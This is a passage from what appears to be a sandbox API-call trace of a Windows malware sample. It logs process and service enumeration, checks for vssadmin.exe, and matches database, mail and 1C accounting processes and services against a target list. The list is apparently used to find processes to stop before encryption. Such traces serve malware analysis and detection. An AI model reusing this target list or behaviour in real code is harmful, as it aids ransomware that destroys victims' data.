th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0265.563] lstrlenW (lpString="cmd.exe") returned 7 [0265.563] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0265.564] lstrlenW (lpString="conhost.exe") returned 11 [0265.564] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0265.564] lstrlenW (lpString="vssadmin.exe") returned 12 [0265.564] Process32NextW (in: hSnapshot=0x2a8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x608, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0265.565] CloseHandle (hObject=0x2a8) returned 1 [0265.565] Sleep (dwMilliseconds=0x1f4) [0266.131] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c06b0 [0266.180] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0266.182] GetLastError () returned 0xea [0266.182] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xba0) returned 0x57d8c0 [0266.182] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xba0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0266.183] CloseServiceHandle (hSCObject=0x43c06b0) returned 1 [0266.183] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0266.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.183] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.183] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0266.183] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0266.183] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0266.183] lstrlenW (lpString="AudioSrv") returned 8 [0266.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0266.183] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0266.183] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0266.183] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0266.183] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0266.183] lstrlenW (lpString="BFE") returned 3 [0266.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0266.183] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0266.183] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0266.183] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0266.183] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0266.183] lstrlenW (lpString="CryptSvc") returned 8 [0266.183] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0266.183] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0266.183] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0266.184] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0266.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0266.184] lstrlenW (lpString="CscService") returned 10 [0266.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0266.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0266.184] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0266.184] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0266.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0266.184] lstrlenW (lpString="DcomLaunch") returned 10 [0266.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.184] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0266.184] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0266.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0266.184] lstrlenW (lpString="Dhcp") returned 4 [0266.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0266.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0266.184] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0266.184] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0266.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0266.184] lstrlenW (lpString="Dnscache") returned 8 [0266.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0266.184] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0266.184] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0266.184] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0266.184] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0266.184] lstrlenW (lpString="DPS") returned 3 [0266.184] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0266.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0266.185] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0266.185] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0266.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0266.185] lstrlenW (lpString="eventlog") returned 8 [0266.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0266.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0266.185] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0266.185] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0266.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0266.185] lstrlenW (lpString="EventSystem") returned 11 [0266.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0266.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0266.185] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0266.185] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0266.185] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0266.185] lstrlenW (lpString="gpsvc") returned 5 [0266.185] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0266.185] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0266.185] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0266.185] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0266.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0266.186] lstrlenW (lpString="LanmanWorkstation") returned 17 [0266.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0266.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0266.186] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0266.186] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0266.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0266.186] lstrlenW (lpString="lmhosts") returned 7 [0266.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0266.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0266.186] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0266.186] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0266.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0266.186] lstrlenW (lpString="MMCSS") returned 5 [0266.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0266.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0266.186] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0266.186] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0266.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0266.186] lstrlenW (lpString="MpsSvc") returned 6 [0266.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0266.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0266.186] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0266.186] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0266.186] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0266.186] lstrlenW (lpString="nsi") returned 3 [0266.186] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0266.186] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0266.186] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0266.187] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0266.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0266.187] lstrlenW (lpString="PlugPlay") returned 8 [0266.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0266.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0266.187] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0266.187] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0266.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0266.187] lstrlenW (lpString="Power") returned 5 [0266.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0266.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0266.187] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0266.187] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0266.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0266.187] lstrlenW (lpString="ProfSvc") returned 7 [0266.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0266.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0266.187] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0266.187] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0266.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0266.187] lstrlenW (lpString="RpcEptMapper") returned 12 [0266.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.187] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0266.187] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0266.187] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0266.187] lstrlenW (lpString="RpcSs") returned 5 [0266.187] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0266.187] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0266.188] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0266.188] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0266.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0266.188] lstrlenW (lpString="SamSs") returned 5 [0266.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0266.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0266.188] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0266.188] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0266.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0266.188] lstrlenW (lpString="Schedule") returned 8 [0266.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0266.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0266.188] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0266.188] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0266.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0266.188] lstrlenW (lpString="SENS") returned 4 [0266.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0266.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0266.188] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0266.188] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0266.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0266.188] lstrlenW (lpString="ShellHWDetection") returned 16 [0266.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.188] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.188] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0266.188] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0266.188] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0266.188] lstrlenW (lpString="Spooler") returned 7 [0266.188] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0266.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0266.189] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0266.189] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0266.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0266.189] lstrlenW (lpString="Themes") returned 6 [0266.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0266.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0266.189] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0266.189] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0266.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0266.189] lstrlenW (lpString="UxSms") returned 5 [0266.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0266.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0266.189] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0266.189] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0266.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0266.189] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0266.189] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x348 [0266.190] Process32FirstW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.190] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0266.191] lstrlenW (lpString="System") returned 6 [0266.191] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0266.191] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0266.191] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0266.191] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0266.191] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0266.191] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0266.191] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0266.191] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0266.191] lstrlenW (lpString="smss.exe") returned 8 [0266.191] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0266.191] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0266.191] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0266.191] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0266.192] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0266.192] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0266.192] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0266.192] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.192] lstrlenW (lpString="csrss.exe") returned 9 [0266.192] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.192] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.192] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.192] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.192] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.192] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.192] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.192] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0266.192] lstrlenW (lpString="wininit.exe") returned 11 [0266.192] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0266.192] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0266.192] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0266.192] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0266.192] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0266.193] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0266.193] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0266.193] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.193] lstrlenW (lpString="csrss.exe") returned 9 [0266.193] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.193] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.193] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.193] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.193] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.193] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.193] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.193] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0266.193] lstrlenW (lpString="winlogon.exe") returned 12 [0266.193] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0266.194] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0266.194] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0266.194] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0266.194] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0266.194] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0266.194] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0266.194] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0266.194] lstrlenW (lpString="services.exe") returned 12 [0266.194] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0266.194] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0266.194] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0266.194] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0266.194] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0266.194] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0266.194] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0266.194] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0266.195] lstrlenW (lpString="lsass.exe") returned 9 [0266.195] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0266.195] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0266.195] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0266.195] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0266.195] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0266.195] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0266.195] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0266.195] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0266.195] lstrlenW (lpString="lsm.exe") returned 7 [0266.195] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0266.195] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0266.195] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0266.195] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0266.195] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0266.196] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0266.196] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0266.196] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.196] lstrlenW (lpString="svchost.exe") returned 11 [0266.196] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.196] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.196] lstrlenW (lpString="svchost.exe") returned 11 [0266.196] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.196] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.197] lstrcmpiW (lpString1="sqlservr.exe", 